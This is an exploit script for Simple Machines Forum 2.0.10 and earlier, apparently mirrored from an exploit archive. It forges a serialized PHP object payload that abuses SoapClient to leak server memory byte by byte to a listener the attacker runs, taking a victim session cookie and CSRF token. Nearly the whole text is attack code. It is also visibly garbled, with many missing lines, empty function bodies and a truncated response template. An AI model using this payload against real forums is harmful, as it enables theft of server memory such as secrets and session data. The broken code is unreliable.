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SMF (Simple Machine Forum) <= 2.0.10 - Remote Memory Exfiltration Exploit
来源:filippo [dot] roncari [at] truel [dot] it 作者:Roncari 发布时间:2015-09-28  
# -*- coding: iso-8859-15 -*-
# Title:        SMF (Simple Machine Forum) <= 2.0.10 Remote Memory Exfiltration Exploit
# Authors:      Andrea Palazzo 
#                   <andrea [dot] palazzo [at] truel [dot] it>
#               Filippo Roncari
#                   <filippo [dot] roncari [at] truel [dot] it>
#               Truel Lab ~ http://lab.truel.it
# Requirements: SMF <= 2.0.10
#               PHP <= 5.6.11 / 5.5.27 / 5.4.43
# Advisories:   TL-2015-PHP04 http://lab.truel.it/d/advisories/TL-2015-PHP04.txt
#               TL-2015-PHP06 http://lab.truel.it/d/advisories/TL-2015-PHP06.txt
#               TL-2015-SMF01 n/y/a
# Details:      http://lab.truel.it/2015/09/php-object-injection-the-dirty-way/
# Demo:         https://www.youtube.com/watch?v=dNRXTt7XQxs
import sys, requests, time, os, socket, thread, base64, string, urllib
from multiprocessing import Process
#Payload Config
bytes_num = 000 #num of bytes to dump
address = 000 #starting memory address
#Target Config
cookie = {'PHPSESSID' : '000'} #SMF session cookie
target_host = 'http://localhost/smf/index.php' #URL of target installation index.php
csrftoken = ''
#Local Server Config
host = "localhost"
port = 31337
#Memory dump variables
dumped = ''
current_dump = ''
in_string = False
brute_index = 0
brute_list = list(string.ascii_letters + string.digits)
r_ok = 'HTTP/1.0 200 OK' + '\n'
r_re = 'HTTP/1.0 302 OK' + '\n'
r_body = '''Server: Truel-Server
Content-Type: text/xml
Connection: keep-alive
Content-Length: 395
<env:Envelope xmlns:env="http://www.w3.org/2003/05/soap-envelope">
  <n:alertcontrol xmlns:n="http://example.org/alertcontrol">
  <m:alert xmlns:m="http://example.org/alert">
def serverStart():
    print "[+] Setting up local server on port " + str(port)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    if not sock:
        print "[X] Fatal Error: Unable to create socket"
    sock.bind((host, port))
    return sock
def getToken():
    global csrftoken
    print "[+] Trying to get a valid CSRF token"
    for n in range(3): #3 attempts
        r = requests.get(target_host, cookies=cookie, allow_redirects=False)
        r = r.text
    start = r.find("action=logout;")
    if (start !=-1):
        end = (r[start+14:]).find('">')
        csrftoken = r[start+14 : start+end+14]
        print "[+] Authentication done. Got token " + str(csrftoken)
        return True
        print "[X] Fatal Error: You are not authenticated. Check the provided PHPSESSID."
        return False
def prepareForExploit():
    if not(getToken()): #get CSRF token
    target = target_host + '?action=suggest&' + csrftoken + '&search_param=test'
    r = requests.get(target, cookies=cookie, allow_redirects=False) #necessary request
def forgePayload(current_try, address):
    location = "http://" + current_try
    payload = 'O:12:"DateInterval":1:{s:14:"special_amount";O:9:"Exception":1:{s:19:"\x00Exception\x00previous";O:10:"SoapClient":5:{s:3:"uri";s:1:"a";s:8:"location";s:' + str(len(location)) + ':"' + location + '";s:8:"_cookies";a:1:{s:5:"owned";a:3:{i:0;s:1:"a";i:2;i:' + str(address) + ';i:1;i:' + str(address) + ';}}s:11:"_proxy_host";s:' + str(len(host)) + ':"' + str(host) + '";s:11:"_proxy_port";i:' + str(port) + ';}}}'
    return payload
def sendPayload(payload,null):
    target = target_host + '?action=suggest&' + csrftoken + '&search_param=' + (base64.b64encode(payload)) #where injection happens
        r = requests.get(target, cookies=cookie, allow_redirects=False)
    except requests.exceptions.RequestException:   
        print "[X] Fatal Error: Unable to reach the remote host (Connection Refuse)"
def limitReached(dumped):
    if(len(dumped) >= bytes_num):
        return True
        return False
def printDumped(dumped):
    d = "    "
    cnt = 1
    print "[+] " + str(len(dumped)) + " bytes dumped from " + target_host
    print "[+] ======================= Dumped Data ======================="
    for i in range(bytes_num):
        d = d + str(dumped[i])
        if (cnt % 48 == 0):
            print d
            d = "    "
        if (cnt == bytes_num):
            print d
        cnt = cnt + 1
def getSoapRequest(sock):
    connection, sender = sock.accept()
    request = connection.recv(8192)
    return (connection, request)
def sendSoapResponse(connection, content):
def getDumpedFromHost(request):
    i = request.find("Host: ") + 6
    v = request[i:i+1]
    return v
def pushDumped(value, string):
    global dumped
    global current_dump
    global brute_index
    global address
    global in_string
    dumped = str(value) + str(dumped)
        current_dump = str(value) + str(current_dump)
        current_dump = ""
    in_string = string
    address = address-1
    brute_index = 0
    print "[" + hex(address) + "] " + str(value)
def bruteViaResponse(sock):
    global brute_index
    current_try = ""
    response_ok = r_ok + r_body
    for n in range(19):
        connection, request = getSoapRequest(sock)
        if not request:
            return False
        if request.find("owned")!=-1:
            pushDumped(getDumpedFromHost(request), True)
            return True
            if((brute_index+1) == len(brute_list)):
                return False
            brute_index = brute_index + 1
        if not in_string:
            current_try = brute_list[brute_index]
            current_try = brute_list[brute_index] + str(current_dump)
        response_re = r_re + 'Location: http://' + str(current_try) + '\n' + r_body
    connection, request = getSoapRequest(sock)
    if request.find("owned")!=-1:
        pushDumped(getDumpedFromHost(request), True)
        return True
    return False
def bruteViaRequest(sock):
    global brute_index
    brute_index = 0
    current_try = ""
        if(brute_index == len(brute_list)):
            pushDumped(".", False)
        if limitReached(dumped):
        if not in_string:
            current_try = brute_list[brute_index]
            current_try = brute_list[brute_index] + str(current_dump)
        payload = forgePayload(current_try,address)
        if not bruteViaResponse(sock):
            brute_index = brute_index + 1
def runExploit():
    print "[+] Starting exploit"
    sock = serverStart()
    print "[+] Trying to dump " + str(bytes_num) + " bytes from " + str(target_host)
    print "[+] Bye ~ Truel Lab (http://lab.truel.it)"
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